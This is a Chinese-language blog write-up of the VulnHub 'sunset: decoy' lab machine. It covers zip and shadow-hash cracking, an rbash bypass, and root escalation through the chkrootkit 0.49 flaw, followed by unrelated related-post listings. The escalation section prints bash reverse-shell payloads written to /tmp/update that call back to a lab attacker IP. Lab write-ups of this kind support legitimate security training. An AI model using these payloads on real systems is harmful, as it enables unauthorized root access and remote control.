vulnhub sunset: decoy

已于 2022-03-28 21:45:19 修改
阅读量764 收藏 1
点赞数 1
分类专栏: vulnhub 文章标签: chkrootkit john fcrackzip rbash PATH
于 2022-03-27 17:44:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/elephantxiang/article/details/123777551
版权

渗透思路:

nmap扫描 ---- fcrackzip破解save.zip密码 ---- john暴力破解shadow中普通用户密码 ---- rbash绕过 ---- 发现并执行chkrootkit ---- 利用chkrootkit 0.49的漏洞提权

环境信息:

靶机:192.168.3.169

攻击机:192.168.3.130

具体步骤:

1、nmap扫描

sudo nmap -sC -sV -p- 192.168.3.169

扫到22(ssh)和80(http)

2、fcrackzip破解save.zip密码

浏览器访问http://192.168.3.169/发现文件save.zip

下载到本地之后尝试解压,发现需要密码

用fcrackzip来暴力破解解压密码。fcrackzip不是kali预安装的,因此首先需要使用如下命令安装

sudo apt-get install fcrackzip

把/usr/share/wordlists/rockyou.txt.gz拷贝到save.txt同目录下,并解压备用,从该目录下开启命令行终端。

然后就可以开始破解save.zip的解压密码了

fcrackzip -D -p rockyou.txt save.zip

成功找到一个可能的密码manuel

用unzip命令解压save.zip,密码输入manuel,解压成功

3、john暴力破解shadow文件夹中的密码hash

解压得到etc文件夹,其中包含如下文件

shadow文件内容如下,有两个用户有hash后的密码,其中一个是root,一个是普通用户

用john命令对shadow文件中的密码hash进行爆破

john shadow

很快就爆破出结果:用户296640a3b825115a47b68fc44501c828的密码为server

4、rbash绕过

根据爆破出的结果ssh登录靶机

ssh 296640a3b825115a47b68fc44501c828@192.168.3.169

密码输入server

成功登录后发现该用户连whoami和cat命令都用不了,并且根据提示当前用户的shell为rbash

攻击机上查看passwd文件,发现该用户的的shell确实是rbash

退出ssh连接,重新用以下命令连接

ssh 296640a3b825115a47b68fc44501c828@192.168.3.169 -t "bash --noprofile"

ssh登录成功后可以看到当前shell已经是bash了

echo $0

但还是有很多命令不能直接使用,要写完整路径

将/bin和/usr/bin加到环境变量$PATH里面,然后就可以直接使用命令了

export PATH=$PATH:/bin
export PATH=$PATH:/usr/bin

在当前用户家目录下找到第一个flag

5、执行chkrootkit

在/home/296640a3b825115a47b68fc44501c828/SV-502/logs/文件夹下有个log.txt文件,cat一下貌似是pspy的日志

可以看到调用pspy的命令用的是相对路径

find一下,啥玩意儿也没找到,可能pspy已经木有了,或者不在当前用户可访问的目录中

find / -name "pspy" 2>/dev/null

另外还在log.txt中找到了一个解压chkrootkit 0.49的动作

chkrootkit 0.49之前见过,如果它以root权限执行的话是可以利用它提权到root的。

find一下它在哪儿,也找不到,看来可能也没有权限

find / -name "chkrootkit*" 2>/dev/null

在当前用户的家目录下看到一个可执行文件honeypot.decoy

执行之后发现有个5 Launch an AV Scan.的选项,或许会和chkrootkit有关。

选择这个选项,执行后提示AV Scan将在1分钟内执行。

疯狂ps

ps aux | grep chkrootkit

狂按数次之后,终于看到chkrootkit被执行了,并且是以root用户的身份执行的

6、chkrootkit 0.49漏洞提权

用searchsploit找提权方法

searchsploit chkrootkit

定位一下手工方法的位置

locate linux/local/33899.txt

找到绝对路径之后查看内容

cat /usr/share/exploitdb/exploits/linux/local/33899.txt

利用步骤非常简单

首先将想要以root身份执行的文件命名为update,放在/tmp文件夹下,然后以root身份运行chkrootkit就行。

echo "bash -c 'exec bash -i &>/dev/tcp/192.168.3.130/4444 <&1'" > /tmp/update

chmod +x /tmp/update

然后攻击机上nc监听4444端口

nc -nlvp 4444

回到靶机上,运行honeypot.decoy,并选择5

不一会儿,攻击机上就得到root的反弹shell了

一个奇怪的问题:

提权的时候遇到一个奇怪的问题,如果步骤6中写入/tmp/update的payload是

echo "bash -i &>/dev/tcp/192.168.3.130/4444 <&1" > /tmp/update

则直接执行/tmp/update文件是可以触发反弹shell的,但是靠chkrootkit0.49的漏洞是无法触发反弹shell的,没弄懂这是什么原因,为啥echo "bash -c 'exec bash -i &>/dev/tcp/192.168.3.130/4444 <&1'" > /tmp/update可以,echo "bash -i &>/dev/tcp/192.168.3.130/4444 <&1" > /tmp/update就不行。

后记:

经大神提点,这可能是因为很多函数以空格分割命令的参数,bash -i &>/dev/tcp/192.168.3.130/4444 <&1中&>/dev/tcp/192.168.3.130/4444和<&1会被当成两个参数,但其实他们并不是命令参数,而bash -c 'exec bash -i &>/dev/tcp/192.168.3.130/4444 <&1'中由于exec bash -i &>/dev/tcp/192.168.3.130/4444 <&1被单引号括起来了,所以整体会被当成一个参数。

若有不足请指正。

仙女象
关注
专栏目录
vulnhub靶机sunset:decoy渗透笔记
liver100day的博客
08-03 1246
这里写目录标题1.环境搭建2.信息收集2.1 主机发现2.2 端口扫描2.3 访问80端口(http服务)3. 漏洞利用3.1 使用压缩包密码破解工具爆破压缩文件密码3.2 爆破用户密码3.3 ssh登录4.提权5.总结 1.环境搭建 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.139 靶机:sunset:decoy IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/sunset-decoy,505/ 2.信息收集 2.1 主机发现 要进行渗透
sunset: noontide靶机渗透-vulnhub
m0_68117643的博客
07-18 1129
这台靶机(sunsetnoontide)运行在Vmware中无法获取靶机IP,换VirtualBox后NAT和桥接模式下也未获取到IP,仅在host-only模式下才找到靶机IP 突破点:反弹shell—root弱口令提权
vulnhub靶机-sunsetdecoy
臭nana的博客
07-20 1782
1、找到靶机ip:192.168.0.129 nmap -sn 192.168.0.0/24 2、扫描靶机端口,除了22、80是开放状态,其他几个都是过滤状态 root@kali:~# nmap -p- -A 192.168.0.129 Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for 192.168.0.129 Host is up (0.0057s latency). Not shown: 65528 closed p
decoy靶机复现
最新发布
weixin_52956666的博客
08-19 770
使用root用户,运行0.49版本的chkrootkit程序,也就是通过使用命令/usr/bin/touch /dev/shm/STTY5246,或者使用程序honeypot.decoy的功能5 Launch an AV Scan.,或者甚至什么也不做,来调用root用户运行0.49版本的chkrootkit程序。pspy是Linux系统的进程监控工具,可以记录进程的运行情况,包括启动进程的命令,一定程度上类似于详细版的history命令。当用户为root用户,运行0.49版本的chkrootkit程序。
vulnhub-sunset: decoy-wp
yutianovo的博客
07-14 433
靶机信息 blog:http://blog.yutian233.xyz/ Easy/Intermediate (May variate depending on your background) It is recommended to run this machine in Virtualbox. This works better with VirtualBox rather than VMware https://www.vulnhub.com/entry/sunset-decoy,505/
[KeyarchOS]Chkrootkit后门检测工具的安装
KeyarchOS的博客
09-13 3232
chkrootkit是一种开源工具,旨在帮助检测 Linux 系统中是否存在 rootkit 和恶意软件。rootkit 是一种用于隐藏恶意活动的恶意软件,它能够有效地掩盖自身和其他恶意行为,使攻击者可以在受感染的系统上保持持久的访问权限。它通过搜索常见的 rootkit 文件和代码,包括 Linux 内核模块 (LKM) 和用户空间 rootkit,来识别潜在的威胁。当 chkrootkit 扫描完成后,它会生成一个报告,列出任何被发现的可疑文件、隐藏进程和异常端口等。
linux可执行文件添加到PATH环境变量的方法
Carey_Lu的博客
09-27 4481
linux命令行下面执行某个命令的时候,首先保证该命令是否存在,若存在,但输入命令的时候若仍提示:command not found 这个时候就的查看PATH环境变量的设置了,当前命令是否存在于PATH环境变量中 #查看PATH: echo $PATH 举例说,命令 composr 在/usr/loca/bin 但执行的时候提示: -bash: composr: command not found 这个时候,通过echo $PATH,,发现composer并未在PATH环境变量中有设置,这个时候
Vulnhub:SUNSET-DAWN靶机
logan_logan的博客
06-06 582
1.在浏览器中输入目标靶机IP地址,浏览网页 2.端口扫描 发现开启了samba服务,接下来对samba服务进行枚举; nmap -p- 192.168.31.130 nmap -sC -sV -p 139,445,3306,12345 192.168.31.130 对samba服务枚举得时候发现了ITDEPT共享目录,不需要密码就可以登录 enum4linux -a -o 192.168.31.130 登录samba后,发现并没有文件存在,但是这个目录可以上传文件; smbclient
SUNSET: MIDNIGHT靶机
logan_logan的博客
07-22 519
1.浏览器输入地址打开网页;
ConcreteStructs.jl::love_hotel::house::cityscape_at_dusk::hotel::sunset::bank:
02-17
ConcreteStructs.jl ConcreteStructs.jl导出宏@concrete ,该宏可用于使非混凝土结构混凝土,而无需添加类型参数的样板。 using ConcreteStructs @concrete struct AB a b end julia> ab = AB("hi", 1+im) ...
linux后门检测工具,Linux服务器下rootkit后门检测工具chkrootkit安装使用
weixin_36219745的博客
05-07 1089
Linux服务器下rootkit后门检测工具chkrootkit安装使用操作系统:CentOS6 7一、安装编译工具包yum install gcc gcc-c++ make glibc-static -y二、安装chkrootkitwget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz #下载软件包tar -zxvf chkroot...
Chkrootkit 安装配置
weixin_30791095的博客
08-17 548
Chkrootkit 是在Linux中采用的安全、入侵扫描工具,它在扫描的过程中会借助于系统/bin、/usr/bin中的一些基础命令。如果系统被挂马有可能这些基础命令也被修改,所以Chkrootkit也不是绝对可信的,最好的方法是在Chkrootkit扫描前,用一个“干净”的系统的基础命令替换挂马系统中的基础命令。 下面介绍Chkrootkit安装: yum install -...
Path如何进行环境变量的配置?
CZ-001的博客
05-11 1133
当在命令行窗口运行一个命令时,操作系统首先会在当前目录下查找是否存在该命令对应的可执行文件,如果未找到,操作系统会继续在PATH环境变量中定义的路径下寻找这个文件,如果仍未找到,系统会报错。右键单击桌面上的计算机→属性,在弹出的系统窗口左边选择“高级系统设置”选项,弹出系统属性对话框,在系统属性对话框的“高级”选项卡下单击“环境变量”按钮,弹出“环境变量”对话框。在命令行窗口中执行javac命令,如果能正常地显示帮助信息,说明系统PATH环境变量配置成功,这样系统就会永久性地保存PATH环境变量的设置。
Linux系统后门监测工具chkrootkit安装与使用
kzhzhang的专栏
11-13 1690
Linux系统后门监测工具chkrootkit安装与使用
使用chkrootkit对系统进行rootkit扫描
m0_74540090的博客
05-10 1520
更高级的一种入侵方式,它可以使攻击者获得对系统底层的完全控制权,此时攻击者可以修改系统内核,进而截获运行程序向内核提交的命令,并将其重定向到入侵者所选择的程序并运行此程序。平台下最常见的一种木马后门工具,它主要通过替换系统文件来达到入侵和隐蔽的目的,这种木马比普通木马后门更加危险和隐蔽,普通的检测工具和检查手段很难发现这种木马。的过程中使用了部分系统命令,因此,如果服务器被黑客入侵,那么依赖的系统命令可能也已经被入侵者替换,此时。使用的系统命令进行备份,在需要的时候使用备份的原始系统命令让。
Path环境变量的配置
热门推荐
m0_46983541的博客
09-23 2万+
Path环境变量的配置 一、配置环境变量的原因: 开发Java应用程序的过程中,要使用JDK提供的开发工具,而开发工具在JDK安装目录的bin目录下,配置Path环境变量是为了方便实用“java”和“javac”命令。不然直接用会报错。 二、Path环境变量配置的过程: 右键“我的电脑”,点击“属性”,弹出“控制面板”主页,点击“高级系统设置” 选择“高级”,点击“环境变量” 在弹出窗口里,“系统变量”里点击“新建”,弹出“新建系统变量”窗口后,按图示输入相关信息,此处“变量名”为“JAVA_HOME
通过chkrootkit学习如何在linux下检测RootKit
giantbranch的专栏
11-02 5354
Rootkit是一种特殊的恶意软件,它的功能是在安装目标上隐藏自身及指定的文件、进程和网络链接等信息,比较多见到的是Rootkit一般都和木马、后门等其他恶意程序结合使用。Rootkit一词更多地是指被作为驱动程序,加载到操作系统内核中的恶意软件。 chkrootkit简介 chkrootkit是一个linux下检RootKit的脚本,在某些检测中会调用当前目录的检测程序 官网:http://ww...
chkrootkit安装配置教程 – Linux后门入侵检测
收集盒 Book box
04-18 7419
rootkit从浅显的层面来讲即一种具有自我隐蔽性的后门程序,它往往被入侵者作为一种入侵工具。通过rootkit,入侵者可以偷偷控制被入侵的电脑,因此危害巨大。chkrootkit是一个Linux系统下的查找检测rootkit后门的工具。本文将介绍chkrootkit的安装与使用方法。 chkrootkit没有包含在官方的CentOS或Debian源,因此我们将采取手动编译的方法来安装,这种
chkrootkit的基本安装和使用(对依赖命令进行备份处理)(rootkit检测)
yang_zzu的博客
02-10 2246
chkrootkit 在检查rootkit 的过程中使用了部分系统命令, 如果服务器被黑客侵入,那么依赖的系统命令可能被替换, 此时检查结果就不具有可信度,通过将依赖的命令进行备份 在执行 chkrootkit 的时候 使用 -p 参数指定路径进行检测 官方下载地址: http://www.chkrootkit.org/download/ 出现这种问题...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值